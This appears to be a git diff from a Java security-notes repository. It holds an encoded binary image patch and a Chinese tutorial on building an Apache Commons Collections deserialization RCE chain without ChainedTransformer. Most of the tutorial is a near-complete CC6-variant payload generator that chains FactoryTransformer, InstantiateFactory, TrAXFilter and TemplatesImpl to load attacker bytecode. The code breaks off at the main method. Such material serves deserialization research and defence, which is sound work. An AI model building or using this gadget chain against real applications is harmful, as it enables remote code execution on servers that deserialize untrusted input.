z_iowy(KR}svfWQfwVtpOI4?fDIiBwfn})T}@jqiE-iE%GRIV*{{xsl?w{B^6YwBZX zPvc9`=OYtXPB+`9Dx$Lr9T!`M3HI{`qIU@>$*Bc3a=yu;Kvfaxf}d?T9uNetfE43V zKIZ{==01)xd(BG0$OjlvFV`44G>PE{G2;K_pT15i^r>+3&XoZ{7-KPDTNJK9OLRwc z7R7;A2tpW3bSBy!b_FT`LP(7NrQG+#_n2jiNu4&_DK^{gbL?XD{V;Kd#k7xYugnBDmMMv;Cp+oXHWwqI|M(OT7A zMfa|QG?!GM_l7OL`O;-S^O46_c>X`n!4b%ud^I&C)WelOl6(5$moRAlGWN^@EE9ITQf5-0$h;bBC%Yg`6EJ}zaOj1qCwX-h!=Ewuu+jvPm_f>ijcJG0mIy%_04iRB>+cbFxcd_nM`7a_FhZG0@EPFc||~=lOw_epbM=FntIxm_*Ulo$I3a z1=q8_o#Z|Z{33oRkQ(isP-9&N)9Do=v6K4|-yF#%`}Jb5MBL}Tg5nBo8tSvn^BtmD?Wl1v zBtJ0FCf-RV|}mqX1MA(312|RpAk(h?i#hA&s6twwWcP&#W#{ek?Y$dUX+mRys2X2 zdxY!?f6M#M&4jZURydEn)Mk_3t7&UX^=d65^MLcIB#YZXcKzy6LjNrq$d=pa{M>Ag zufbeHi0B@GQC&U9R|D=pSGx9XN!84&DcyBJQ)L0NYt}cssuW~o$JmyOD$6n!r;S=; z;8hW#1k66)MN(1ro#^vDAZp|Ia!u&=3EqR1t$YJtbhXFjK0 z)Ib~BxYAjcVP50?26y^)H&&~B8Un++Yz1J-{Gl93Y1_PETB{umf=rt8fnwf6!n>T| zjb3(zWGKR-5vN|^q)~FN%?%%y7Q^pS%+sO!ND)35~$FEuh62d>^pv9 z=FJ=%KlC@FHj|2_*c$Nei9GG1x}JY@aY~V=nLO>d;45xHSIiRiHG$KrKKmA!uyLyf70K{WP{wP0v%iKBJpEX(B)2ZWF0(SL2f z+QTqHtG}P^_2Tn8X2BdVqF+)leXPd=!jz8s8G`Mt$offRBr}5=wy@h(@)XdhxFFTJ z363O?YUa4q*wTtO31n5&$_2=~P`0-a+>@g#8h5ugLI@2M9r5+^`GIy`(DIvEy)~_T zmyKpwL*!I?hAGehg}F0+ipl;I=U5m9&w%^`d1n!#Qjxu1kZ7m?F!592+;E(2M95>i z@a&6Eds{s>eP0jJ21T)b)QXvvP4iw-AJu4B#+PpdeeUTn87H@kgQgB(GA|}~Ynks! z)k;w%YBbaZ?+8C?wzbOR5&nLHxk($7#H1g0De)O}@hQ9yoE}&r`HH1%YydA<_k698 z^PSB<5*m)*{L1-Xf~f~rHU7`p%;lQHS0CZF4}!Gt%Yry2LNYS2t3yDDhouW8t}Ima ztyI7FhwyEXKCt{)>QLEI%ptiY#kLVq@LGQvsFdLxE~zu{K$MYh_V5cvdx!M{a3YPJ zg?*iz!qgJL@Y_47xSpnFab*y(5SV8Cc3pwpNNHP2D0?!UxtA*Cx6EQ^O30qQ>EvD9 zI7Z}jiLWfBf)4hm9vHktc7c-FwCv~z5uh%5Lxpthmc;hDaK%=6_@^Q1 zjpAKXTf2$Z8cTex#1aHHU@qi~LGs3aX8&_ZyMnY;E=_4dTUyG*8CXk0o%a1fvnR33 zd-Hr_8*=b^C%S3QMId`PQ4}X6kAD7UQOvw4vNWR~eDCC`Dep=U@#9b|^x-q&b>n4rUDdd*L0jYr$yWw;KaNxCo@ZxkvMS#o<~N}S47~i? z^(3|lbE2}J+xSWDOd2uu$q$OR#Id8|h`#ieERoP57YBkUNn~W01ZH^>lJNqZXHtrb z3=jXc+3_5+c}?o}{P6H~N}CARM=igCJdD|% zZ0{yv1)F3Mr_QZQ5O-djCKZMbNNFkI{Y5xI_}g&zd3rg^UmIkO4+$?c@Uariv2OhC zuhmq=uTd>nOOj!M>l`N`>h+yRWQKd9r{fq;^H5eJ_AE zs&|7CV>44X6vG=zk;+Xz!FUz-$CRIjp4Qj((M+3UJ?Z3&a%Ar(2rxXu7%`oXMP2E* zS0u~7y+ydC1W`wVCUtvQXnuaw7ky5Oc$aFf{NcyMni3_m4COqj=kE{77r1s;px zUWwUX^L#f_ZjpyhLpeA})5yC9q#TVgbUMcc?SPHq;fzIkqb$JQ?lL7m$!xZhyMd4; zg7MvE{GYNIQPgU_L7xpcH9`ZF{5s&~e)21yGYz))tPhPp4S zEeK8sBL-g;hg-c6jMNmoH2fu^mO6K%4Jh45|^T-#h&90OgA4 z^_M#16(^sF9~Pcf4P5~i0T-On_h$F|(1B4y_EfHlz)b(u(0a*`YaVz{e?P+h<=A}G z>oA6nwPt4ueM|3q8rWyt7hf$*PHJ)|21`x9gps&F8wB?i3|t!DKhTat*Ve+wRj&NG zC^)o}3<*J3f~c->&ZQxxQ`@5@fK3<>%86NS$ue3O81^{{5`vfHBSZbXg9~lGo!5QK z>8)c*cq?J}3ryH+fbI)&z@Af&_fKNQGWzJOFI0mMox@Vv?3 zuw;yqUz}N)DKfa6RS=k!NNaQqfx%XBp5dAlkc0e8I;^qSN4T15Z05M z&7Z?g6mZ;XqRSmPfZvifzuT1)`-=58H>R^ULvu=RU&9&4O@j~&rK#l*5?|86WR>7K zG*d;lXx%7+Rhi{^AhRhiFC_fNtI=Dr;_3-e}c? z+eFFDwb&??snJj0S;L!S7)8n9*%j)*^ue_xgR6aAHep_loOgbzTG|W8zVnO21z*SO zO3-|%1d;UyVjbbW%B$3^zPqoXLzakdPUSEF0;If>(j7}yAt0{`#-qMhJbK;tI6PBz zA=9WEINO0o-9U$b1Dymn1>W}I2P5{E2T?z=ksE%__!ym3NgI{@II9U7Yo-fl^!jUZ zUKZ5ca&?aVz3+4~CTKnpsyGUG+^7z#-mV|p8(A(jH4a&t67Wf)rPDyJU#|`8%uDm8 z{_OId^LywT&M2<1xS2nB`Q((|%pu>f5Vl^4&64Ipvs@5uqAs4(D%j&hR-dWO*MTEn zB@j6+y(YVCU=5iK$8HETYN&CQ+N!`%sXGXOVlF$wRG6m01?wKY?(e&15y@v3#F&eAD=eC}i`G z7Pl)puVWF7qUhx5Zd}(MtleGW$wROW_m--~G(u=A$7B3Sr0tJP3`B?HTi*KDZC}W~ zSvLA&?wF13_%p(xWB1`lV1>OLyBXKU>k|vZhv8&nYbJ2YOg6Z{Cr)12KhM(aK9S{1 zKC>xV+ALa!w6ZJQdzt^4+OmH2(VV~1+ZA#lI*1`y-q%`xH8fT93*HU`c?R8)ryK@marP`Zcez*T{EMNf_76 z)f582qF|)T{gw*qoV3KFTxBWJc!)qX@7WYaN1ZlHDcFO@mu605CjZw61!1FZS{*Ri z7p>XZ#0M%c5kJFQ8jE8HQV?yb42XFHmW#~r7cI$*sr};6^?_)Ar3^3OtLO!zHrdgo zlF+#%-=FhHA=^Z3%0@JT^FcxKpZPCcoV*a~iubm9#|6-f&{i1Ev?7HOXY?Xx@b<~5 zMPNO#T?jje74KZOu}l4f{Q(tG5)7VgRuoc8D^`MwUKBUZvmy+gBI*~n7B*|QKI!#< z$^nwJ0bJ;-Q$_kg&#}PMjOLtZ5+J!nJicTCf&S8s`^-7yFf-;e}&4 zOF5SFL;@=)+6fIhKm1x3YDXFiK6yV0VMeT zg}=YJvZ*PeM>X|Pk4o0Y@R0ikR-*NX>B0u~l$RtsHBSvLjtRAG{t8@X^nFxunaTS@ z4fCN++rD%zzgZ?^*O!iiO@ah=$f+Dqk%$97Ee)iQK!&`niXf_V9}(?@k;T>LO&zXJ zfD^?+JW6iaOsm5}zt@PkpRzAlr+SU4?8;@744c#&a6XX5vLus^5|3vMr%iF;z*$^@ zJS~e8G>tU^WZhLlc0NBilF~#QZ*aZQJo{)JdYo&c+YV4RXGOdWwr@e;pB!_Urj1Ee zc^bW^u%;nT{Af1;u-wg~ZPUri4+Ks#-rf)NR_TL-kgPAdP1gP0n!YL~! zFK+E>4>7MH^6Q!qHbZA<99S4qaN`0$#%JNTne5_-Nz#}t_Mr?gowQUFR*zxMt`o_! zDw$UZFrs%Sd17(B2)Pf~IUApNIsY>d-PVF!oIV_H*$RFFluh6Aea4N;B}SIhSR0xe zV%cAnTp`K!RA!tsiDCf&iVU}$fbo-{_>^qJd?o|b+Y-~+ySOM2b8p-tg7dyI7a@pv zN$|(HEH{Det<7u+c6`?9)j9daWuNf6arf6ayy%+7c`fQekorq1%o~rk`o?@a<7A9D_3E{p) z+V_78n-d~k{`0P*XX7s_iuPa}|Ncdi91;KisEr1Rp1d4iKxInuzV4D0EYK) zo*cj^!licXlq0yYsr}2)jo@XOEPHZb}HC)G2F>yzt#)!Zlw4}&|*G<*fsJ|MY zWfI|hPgpzqJ&|$wWg&Z;B_*IJ6G$oPLb|OesABr$GKVzru0r+;K>upUF1WmK9HAd|eV%R+^ zIC|Vx`J}$Y6n@u`!Yncf@gf6Ku%0CV^oGEHo`!`J4gNzG(hgdB#|Y4jn&X^!-br?^ zTAFfjJNs%u=!uzZYD|D@G2d=3N78}f*ib!ghZnl%N<2IDe(nJT+)kl5Fze&hdG_`N z#fez{GhW}fu_tiBQY5h9(%00D{u%k7_Pu`abpqsGylAA!HUyUXc%(5qUdYn_;d_w1 z^!#NvcmRGh#$xgF!RWZ&BWN&7lX*61SGY3uXBi$Dcw9@u-<*=-&DZO*GGpvZ{uJN$#cBOJvP~HUt-=nO@ zp`Y2&Ug%U;@;i}N5wCOXrOvv6!J&3+Sd85F!bWk=#jD%@6pQE2jg&}67~bLk9{nIG z8HgPIaXuft_OO6h7IF%E$R!be#S>ddw}pNBeDrS2c&@9lGkQ-c-2r1aC2m&@&gC9f z=E5~>#j3W{UP^^=38wGgxc#0MFl}K1U`3usXGj+6_X-1c=zzxn&h^A4)h5wQ8KK! zBkq~;oO<^sov4EuG9^$5L32z;Knm8X{ED<>Knz4oqF3NGl%>J{Yt*Oy�GNF(jM* zW#s5uEZ`qf#pe=PhI@*e40wZvuC>PR)a*{O&epT#e@lyc1D(+vplfMAULg0}M5Yo_ zpXi9PH~3ZyduAwhJ(juAXp!jea5CD39K{_=z?{fv!Deb>)`9I*h=UTC2u=tXq_NBPK;fkXYJzt3zgf&N$7- zo{0WCD>^3kQnYJ*1xAk|I8U1+klngm!x##yT{M0t#wMjZ?lJ}i+RUUkYsS&6ghqJ3`Wd4pX9qu*zDM0ySuyQ{L)dOIZPw;z$hg@kyyZ1To~e@ zo(zM`O1F|{m?}>Zc0wy8*~XyBEVQL;fD%a1V@*$wIx)*NL5wUeCxys&@VR&*yM}6S zTxuPUQ**J+BT~8+LUEp0LM6D9=ZXI|{2Ka&7q+~xf6vFCSw7E?W)dTRXH0=%P(Re9)HIdA`0o$ewIZaJslx?sZ|)#@gr~HN z=dts%6l;zwgB8mH%!c=gnglka8&HePDMU+xcyn{d%JmKzv#fEbZRuPA05yk^#N-G( zw4lz<2$oA4BQoA(qoAly@0R@{9X08Oo?NL((YP0K;|cR<)1>ewj|w-2I=5^rbnT6U zQ`WulMGn)Vmm*ifEMFdz7b^}uR`NjRP&>f`vjsDxE7$^>9g5&X6@p0p!qFn%A{U?- znwVerXP_`WYB*&xpDo?(mj$-LkiIY>+{U;=88X+Ph<*ar_^mk)djE#cF?=t6=8MfQ zQ7+67nA9s;C&{CS))OylpKeL(Jg_dD?Nr2KSNgfZt+Ju$Bg~DV6bSm4`|?@h{2>Cg zp5V$;v$|uCTCy!)ACR+4_3x3I`OR8=>q?XUKHkjv2+Qe+mCj}w=c)b#l`p3bkWpZ3 z9=#ZIUPePnWYi%`c*KCF&@xckSJg0(t+gGn+yy*Ro&`4dm&TC6+DzX_ULtP5rxj;t ztZkJN%LO4267RzewONu)x6sa%NHASDd0FqB+@4G9K$^yNGm~_mOBQKi(BVt~|LtOK zrQ-o5VBaJd2b8>&_?CtxEUC|K9nGpN^DKCHV%I{6BPn8pI<&Bdw2bk4bWP|s7!;}D z?35pbgKH0*srKfip=jo7SB_5U5yLo@XXYpjoW`lRg(2+!5giR)N(<|5q-2j01z5@& zDMPN!+R{wGLF)$ks7pq069SC%l)U^>d;@)IW6#`@eQ+xR_hAi zS83N2j^;A5ChPI8Jh8xN???X(Gp!oN1u&>@=WgznZOjsw#Qqllswb>`ia8HU(5h#R zJFGJt3Sr*UsxACfooH>Fmgt+U?IC`G@O%vl$OD@SP4w2@+?}=}a#-8R5~VVaFZJ;a za3*C9Eb!g-V|y~3Bh3{Pf3Yb8CYj#Z$@Db$X3>`D^~$v!A;10{o?`oooX(_;^3|TK zCC9J9;J7*w!FCN(v=O{-b}kFWW|U)>HxV(0B{kOLe@rFqo9jExR0R3UUbGB>u8CJK9X5NXEw~Jx`nHv@P@7N3s zr}BJ#b0hnNw{RgrIP1`0%4UUh#{P5U9??G64N4!Z!Y*lgwpAN0VUg*r<~#aAr9?34 zV934FK6^E8C=fky|6ecPOZ(SPl1j|ZI$T0nv50PajezS#?h{6F`${WzQOYU;pN}di zWv0?#wecL_D$O8u6k(SWEH8@D61p>2ww|M4b#csUIkOk-l;U~=<&xU)JtWESaBq;g zFGZ@n38r_|Q41KJgCtrW82;fTy&sX4g#J(>n};hAf~U4(J)u4lw~jxx=rKBOrY@$) zkyKVzI!rZ6roJkDGq*lEvZtypqy0fHw4!SZ)l-yvS+JNq>L8UDUVO^BDy-i;Xl!gr zH7z+}M1W^fx4N(X?u`wpY?bqD2X<{x9J;f4P|>eJGUde_?afPI-!8hZXGhF+!aGp0{`?c*?huiVQJ&i zy%f$$u>+;a4T)u}NnYb-Fx1e9992K84?54+<=>VURXoW{3fAVBzg2bR%H3DRo=M{A zyW-G*;>ysVd0Z144t@rHQsi*2;&cnf4+{m!2-7CEGkj4s8v4e?MOJKn=WiQMf212> z;Qu|pwytTm4L9|tBhQihT89x>j-@RW8hs-*N*qNL&G{%dNTOQZN^Tvag45`e4GdYJ zKEbi_Rpv=t^fWs}WN#44dUyC~eZ*jYJ$iclG}uauw#l=7%3E>7l&EpV-L&kTqtnk% zy7(II)GW`3mxX-naa1mbu>%LYt5lH$(jwLA??k2T31Jz6g}vBo?BW1`-Lc$H4C2jg z@7}G0QR$vWc}L8F(aeu>ngN7GEf77B31)3?TZsaatOPdkk_i$7g`r0-Cm~W5;&S|4 zlHhtyi+>&p81&DY8f7IXQ1#9b7bjN((05dcc|EJgU zjt9~G>GMTC9%tzp+m9|zjQ$x69G|IaPQ6=6fV|gblIWnJTTE<*^ldyaTkmgnDh*N3JI1zzSge4Ls@e1zQpgCN3z1l3O$Te%oXv2k#=B# zq1_T0Q*{n8zH?2zeE51S zH^z5{y^X*mOF?x+@4S%BAx9qQr_XTw_6iCxd*RS$u~@ltWVzQM8QfZLXzY;9h56*h zdfps0LoDkHJp-cGMtzF}h%X{=pvRvRnfjG@Sdf^A%xG;ko&2`83a|i?)7NT{KP|Po zYLP$HP=kImfn#W`AuxM{4-wMIz!ymz*56bBEImydXZ_|2pE}PsO!bSj!ISUo<6!QV zu=!-ae}e7n*VKPQyA^c)j&V-@sp>*bT$!6_TzKbMy@*2In3>C3nv`o1+O={-(?cNq zO&-7^_Efj=j)FkMIk_`CS#tFL497A2t$p1d>xDD8xbR}kLkZ~{_F^OCuq)~#$N%HH z-g~KHt?hG(@xvm>2onm6{ptSNaZutr)e(Arl8HVSgq{QftbcAlu*LB?VEe1*wEyx;>LQ2p*ilNr?D_%cI!c(7=o{B6el>J! zgT+(Ez}?O{kC4-5uCXmHpi((5ZA-7UvzRsl*Ft`~Qz2o+La9#}m8-~+EYI*cplGoo z3znlynNVUMEL3o;&g(ynjXa2*m1?|wO3Kt^eW1orWVS5;<%BjQ#~E5C2*BB5jtaT& z(B)Qj&D_W9si?)qX|g1rcp1<6K%+?9*j{{uOp32?QQB-->AutYbJ{ooKk2!$GOchg z+pe7?-7quCq&DyOw(!h9)NN27yfmw!o-pGBj*X$5EwVl#3(qd`9mt)hnGy)ti)Dlw zp6j1E--Q>(2#oBu&{*Kh@Roen#34)b?sx)w$%@gIy73SjEY)kBt2=BkFFtM7ZfVxo z9@Nj)!=kH4szW5`H=J=ts+=HbODHU;K!iJRu%LmOGH;a5d-Dqd`+-WZ`2gWT3&0p^ zC;C$&rmg%){~I{JmIIxO7C@eUbTeOtEs4Oq2bT;GTztRVi|s2JX?qx}?GGFxvydG& z3S*4IJ|p)1y%6uiZHekRh#qdO)-_8C$YKK)%z4}m8VX&*x%67HP3%mVR0Lq|2znvy zH+v3yqw^=P={PkIg~bfg#V*cnO;|dp_~dIcr*-8X=OoBkQa_D3=F&@@`+e&JH&cK~ z1z_AtD$}1WzyoDcqN=P<WB#UvVgjBOdGds`6irThKqIE8oZ&O<6At5eNcys< zuAf!e(+r>`z2#TxU;@q1HU#Q5!5UPo>;wQLSeHjH&-P)KM6#e2(d?~Mto-v_)1>1F zV0fiUE{NpdqZ`U8ImWzxE6CPA zWPq~;^IJi*cwVCH)xk2&fBLcZpMU;)KCo0R;`G13>RZ1`mueue9ttz9fo@h z-@(cJ--DX1&ze_+^P;M$l^t6@t1_sSG+ju z#i7oB(MyBJ@3TKV$W4{zeVtcm*w+44p~`t#94$M!!+C(SlSG#m^^EgGu%l>|fm>9$ zo!r=>?P@N2M4~dDCX|qSJhU4>Y|LsNHVXO8bP;t`5~79zcYsJ$?rYy5c9QLT$>00J zImE43;DWx1cJe(`?m3#N)M9u*XpiO3NwY-k@-DaI)A3Fw>!tpbFGA0uA=5ZGed*A= z4~Q5kQs1d|MH;R>u8C2aySTXA&r!ibFwZmKsBNH#UcglnHJ0&V1$4KFb48XIU9Sr~ zO|%_RQEZDQ$L7Uz4`A6s2Pkn*WO@=9j9uJyO?@Fk$v(aFWl%a}_hjx8tb@l)N+)vT z9IH3PjI+db+1!rE*1@eJ^0nD*BKRjcgo=h1Tqoz78D+!}TQ}d9IHl=Whk1iv*LP2l zb=3V463DP&wQRQ0SzKa2GjOl%dKL0UgTx>Ro~d^CUo}jmrSczvvizb_3wH7^6dmbS+qs&uWiiNG6twTK~9xEA6B)?pcnz2jNbTJQV8 zr((>9pB5Wz&~J`1^(bqvO^G%(dr6>Cjf<4~?FUsbu&g(WBisc6=P^7DU^I>=@X(gm zMDU-yqF_Z7>>#}WWnRy)IvMqLV+nMZ)utG;A!Tt%a(48oO?;!cj@979JPcGs zslgNuz1sV2x1@MH`T`Wl2BL6xW}B@$Xj46-t+Od%v>w^jq^u+eG&V^i+b_}=bv)fM ztns}y6=rkB>r2isKJDa%xV;v6&D(zcc#9$!bZ0*K%Vd5AMucuPS7PMtF%8f7UU6ut z7tBF?W1Z5lOTCZCau6Qr7>MevTj-*x{UU=J8N>`l9K0cJQJ>$E@&yx`js6Lim}L}< zr(syMrH_OxohK{>kM+qB(8K|7enk-65l6lO^MbBk)#-?ZZTI&YU9lYK_)Bva|G70T z-9s4B4RMsXtyK82VOLYSBgWyE6o|!T)}T07|Jy5y$i;D_XV1>C5Zqw4?f#klST~Rr zGPm5v?YtshMzQGw(-;e4A~JGlt6`Twn}gekfwfN%PQ!(6Q8H0dJ}EkT0E~p6B0FV+ zLQWsgE6%i^u=X>3-H|-Nw& z#9w7Z4>bFKsn%C+m5VBFRU0BJy7K}+V=!Wk_UHo?On{#P*EP?R?)$lh6E?v1ns>`| zev@`HWg!^`=_}zoL~-!AA9ts-(ywM7Tw?=E3cjH51cs+|j&c5z>OBTXt4usT6{_Va386yuKWeYh} zE;=r>G%9bE7nN#+^+3c;2o@uW zUp|a)38VJ4RTY6ITN@IuA`XCz=b%d zEwNN@0>fs-PTrI^hj7lUqd;%rFl7IH7JWz6?`lJ;;3)+|TO6yG(ITH$FK2F^YaWVE za=a>LW%+t+q)@3z@{`)IE5^2-6mAEd%9R$VtH{%_w<=4I3u%S)oi zUOP3<{0*j2V3KU%_tNDC0Odiuvf*XFUx#wiVW#A13&ohRGBYy?vW~>WudBz)UthnD z@LwIkQ>jB4ShtIA8t9^6_ekx*$F^r%1p0yB<*+Gyz42YG-)*VdY=iP*2)BVi9GFP9 z{7NsKMy*M~Kr2HFzg35P@njDv;xXPR*8Ugq1A+L>RcW{5k8ktj8XA8UtbbU&kF!0) z=x*Wz`XQJOJcJh25XHy`?v@enK%3E11o&abp1N?1xsO?S-z z8N79{;7G-xBT)#92rk?=@~$)QjR&3vO~N6=ncrAr{ndX53* zt3O*0t+CDug@x@-?szKN*~f8K zHiD8Y6uzF{Yg)`f;J@Z6q?R>eSQVEm(@k6{;$LrV4z_~YSf;s&xo4>YA8PWK>ZgOI z{0x6WE)h)Xjj43#TMVAUHdW6l=gm|U$=s%5m$LW7tFi)s2FxDStwOr#aLhR24bBu{M{V;uNN<=1wa%`2Zz#UHFFzojX% zwJ~r`2^;i$b;K1)_P^d?o>b%?T8Gf(N) zFH_g?RQpa1{=dtSdC8@;Lc4ID{_vL$cW<*Yyp@}4e}qu^LYb-;ifnE#O5?S9dzFAIaX4L}!$Y|*bX+N2!#XHtNso!hIB-lq-B zO==isHl&<>YfrJe#&g$L>69=IIFeY$g85WrowQwG51GbBOg^@8R60Ca3Trz0+IQX- zOq3Gnf~^IS0O#k{RL8^0VGe_HNrpn8(wDht)t<+ri4b~6u#_b$3qhxIio}Q*NRjz9-l<9&kXpRX+qznWT2=YJe4#@J zOlHgva{f!NZjzz1&!unK$i9L-0s-txX6cI|gN4@0s*P(m@-)zc@op^a^w28Ia+-fO zBwZ{QjnP=HFPRU{?p8;|cA@X{G3F(hxyV|qnmXQ@7-=wuCPH5^5cyfLt@ubu z27Fb}<^COo1h@~8dqs!CTKJPTl4VKNiqM0S0rv`yWfj}E(yIMUWXeZmhM)cuIWE>- z7-XujC)BA4dEyfAZUOT5Zn{wS-jD?tD0JiA&+bj^K;4B**d<%8MyijaTD;&3ox zT+@?lz7w~uX6y~Tx0f3EF}6-sQ7b{q^(%?m$)(#VWY+0xgS>8W8Wo-Y?Iuoze@91P zX+tW|K&&BmD>?5mT4!UpyuDC6jb9%6Wz-zM$uZAWCCuUM6peYZAR`HqWZ+WpM5&PO zmbccXc24a}h@m;l!+R()e84q5+A>Dl*V-H@h1hZY=HMPzr3#3C%M0dx#0EjJJkwX$MjVNx>8aSJ#fT#W1x33p4xWSzO*Wm z=fStW_?(&~+v2nF*N#4QV7$dJVM+bt^V)AeMLlT6XThp}(4yjq3rq9|KK^GvyY=ss zt}OB%u0ZiPaOKP=M`NN@%a&)JZpCL~BFk&{LZ2YMH%TKJ)F3b!8x(ov7v7C7w-oJ2 zX_jV1viI1(jV=xrbNRm$xU2?vl&O0BLQ9JTb|C<7gn+bXiRgRAB z2DugWB(g;f9GCz(vfix@ohFhA8s?UCVLdBPBeV3<1WKbrVu%GpC?syV$1cb-zg6Oz$XP@ZGOA3R_v)Ea#$w3x2{pfhCEo74MfoG zJzjEzs6?EudwOcJ%&;t1k~_r{i@~1Fpu=$X8r%46m<|8b3!@-sFLn$EoTrOC>L`a; zcNXmwa0EJehbo*3*=fGLNK!xZXo+L_^?fgphf)hF8E`u(RG+}&cr6?&>yz67$NJsE zg7b{Fcxh(>C1$bsLWETxTca8!PqARqBA>y?keahEbM{5=LrP)_HSo7SYLh0EF^x;* z%HupBJ=J@w_n9y=|R>l@FNUlu1S#%wsj}iRRtk^ zhf8eTOctW;Uu}nbstHolB;<;qziRQ{6E-{XW4NiUi(35hxm!Fi|8z_Uk%T;;V zXu23ATpNU3vrkfZPr7-e35RF{By?YV{@2gv z=`X~kabqY|IYIGykwEscMJn1FZ5C{N!tXo0t5&U_ic4(0l<AGzwmufo z$4FYmu4&IB$fc6?WCdMKVZ33T!9mun_!UpO&TdOji1x%vWV46afnndT;Yc2KK!yW) zCsQL@+n3&Dx^rF8w|4b{OIa;5tX>SBkBi*q5+kOnvbe}RGRQ*)0h!v!R@l>Sb#%Jl zV>wT;M?RB%+R3WFljpb*si4OA`?pE+n71P>*A}V_fojrul$uBb7zX4XJV3OBR|y2m zO%8s5gx_CHtl>|L;m1{>!ouynka2%2@_&_`Kva#0za3tEJTm`w)Uvov_PLwWY$wT~ z+YKCbuuYJfG-Hb#HNPg5D9eN)hb}KA zh$_qX-;URamNW=u?}xSg3{i~;shV|;aCNyfqlMC5V^zJb9uX!ziHt?hopQwOAzI3) zgd09tU}R4FG@+6@y%ltsiy0o8-?Sf><+V_(IBhSDqv4VKQ>)B(ySkyf&<;+--H?k& z({b1zZQ0W5a?R%)wXXIWboX{FDpQL+wK1vOnIL5`SeN%?Lqv|WB7VHPv@bHzDe(&< z*89#fq5+t5N=NUS@^x<4%Y~0p3)XHDWkmJ~`%7hjAh~b34}f~^Wb_ZQ(Q8Nq8Qjbu zJKq9+jzbi%ai)#~cIH}lvzg%OVkDA%k4AC@4TC1a3P5RS;1x3YXTZ%NYopXRZSJ+F zthR+pC_k0cmu4t2PLJ!&ZK5PNW4kkMs-z^(R`KI^|UQk}IQY<_Jm-us6LW))P z3NMbdR=3m(iHwcI{7f0kyhcloY;!&!X`?Rv^l_Msj*~2FBuiS3jyOFJz+ggU3p|8* zG`jq0PO+DCXY)vq_R=(8cb0E=Oihg0Qiicjv)=c|G?}cA6~IWUA(r}N^uUaX3_s!9BsxC4T7Abf0yCif1j+V z*kloZR9)e;?jRPpSa1Bi2uDNk=Fm379#5}xz1*m^e#JEZkMH4xrnq{8h?_L>B1^M0 ze@&=d@+JwzEQkZjhtl`u#}|veSscV?U9=akiCQwG>Rl|OKg)3T)vjO(plAW-zCqLz zFL_T@ob6<7TQPz*d(PlhQ_t^zs494wS*mmE4DH^1kXf%aRVUx>X8sj?v_gdW!(9=d8*GAQ30})$^jZM0-`6|{px_+E+hX(Bg%RhJvX!gx9X@B)TcG{+6q8EJ za+-Rv)tRn*R?Un{9h(d+5*`>NVpt}Jbipc|u8QVeCktYS!apY<==?%xF^P{2@^WDV zVjI)$Ks`);KAWAMwtYCSB!dTbP?OoM7r@Mo1U?8dWsYu8#OqCajrGDdx>aUR*92 z4FDM3JAU<>gTB3?6@~XVm(zsZX~-ap=TD_D%0&mEz;M*H+Gz15G30w=DfPk|0~(5- zha@#4U228tal~4+GEE==8Y_`%D@EJ-@!r+?I-xAWY*Y5~dWSus_iReWAI_Cb6;p!u2! zhpLZ-d$Brnsgb_UdQb?oN~n^d&Equ;T^hVU_k}xPIbr3!vxjRh1~k@M{GSVRvI}LE ufo)Fmh(~{v8*$Y{SCsK8M@AHL>z|k}P7z=D-BaLt>u}DYzCWM*;(q~AM1@ZP literal 0 HcmV?d00001 diff --git "a/2.\345\217\215\345\272\217\345\210\227\345\214\226\344\270\223\345\214\272/CommonCollectionsWithoutChainedTransformer/index.md" "b/2.\345\217\215\345\272\217\345\210\227\345\214\226\344\270\223\345\214\272/CommonCollectionsWithoutChainedTransformer/index.md" new file mode 100644 index 0000000..3738e2d --- /dev/null +++ "b/2.\345\217\215\345\272\217\345\210\227\345\214\226\344\270\223\345\214\272/CommonCollectionsWithoutChainedTransformer/index.md" @@ -0,0 +1,94 @@ +# 不用ChainedTransformer如何实现cc反序列化rce +今天有个朋友问了我这个问题,这里简单回答个这个问题 +虽然网上现在的CC链子都有这个但是我们仔细理解就能绕过了 +找一个Transformer,不受transform调用时输入的影响 +这里随便举个例子使用org.apache.commons.collections.functors.FactoryTransformer +![](./img/1.png) +这里调用了`this.iFactory.create()`,查看Factory的实现类有一个`org.apache.commons.collections.functors.InstantiateFactory` +这个类在调用create的时候可以帮助我们实例化任意类 +```java +public Object create() { + if (this.iConstructor == null) { + this.findConstructor(); + } + + try { + return this.iConstructor.newInstance(this.iArgs); + } catch (InstantiationException var2) { + throw new FunctorException("InstantiateFactory: InstantiationException", var2); + } catch (IllegalAccessException var3) { + throw new FunctorException("InstantiateFactory: Constructor must be public", var3); + } catch (InvocationTargetException var4) { + throw new FunctorException("InstantiateFactory: Constructor threw an exception", var4); + } + } +``` +还记得CC3么,使用TrAXFilter触发TemplatesImpl的例子(当然实际攻防环境下还可以使用其他类),不过我们这里还是case by case +这里我随便用一个CC做改造,就以CC6为例吧 +```java +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import javassist.ClassPool; +import org.apache.commons.collections.functors.*; +import org.apache.commons.collections.keyvalue.TiedMapEntry; +import org.apache.commons.collections.map.LazyMap; +import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; + +import javax.xml.transform.Templates; +import java.io.*; +import java.lang.reflect.Field; +import java.util.HashMap; +import java.util.Map; + + +public class CommonsCollections6Y4 { + public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { + Field field = obj.getClass().getDeclaredField(fieldName); + field.setAccessible(true); + field.set(obj, value); + } + public byte[] getPayload() throws Exception { + + + TemplatesImpl obj = new TemplatesImpl(); + setFieldValue(obj, "_bytecodes", new byte[][]{ + ClassPool.getDefault().get(evily4.class.getName()).toBytecode() + }); + setFieldValue(obj, "_name", "HelloTemplatesImpl"); + setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); + + InstantiateFactory instantiateFactory = new InstantiateFactory(String.class); + FactoryTransformer factoryTransformer = new FactoryTransformer(instantiateFactory); + + Map innerMap = new HashMap(); + Map outerMap = LazyMap.decorate(innerMap, factoryTransformer); + + TiedMapEntry tme = new TiedMapEntry(outerMap, "y4"); + + Map expMap = new HashMap(); + expMap.put(tme, "valuevalue"); + outerMap.remove("y4"); + + setFieldValue(instantiateFactory,"iClassToInstantiate",TrAXFilter.class); + setFieldValue(instantiateFactory,"iParamTypes",new Class[]{Templates.class}); + setFieldValue(instantiateFactory,"iArgs",new Object[]{obj}); + + + + + + ByteArrayOutputStream barr = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(barr); + oos.writeObject(expMap); + oos.close(); + + + return barr.toByteArray(); + } + + public static void main(String[] args) throws 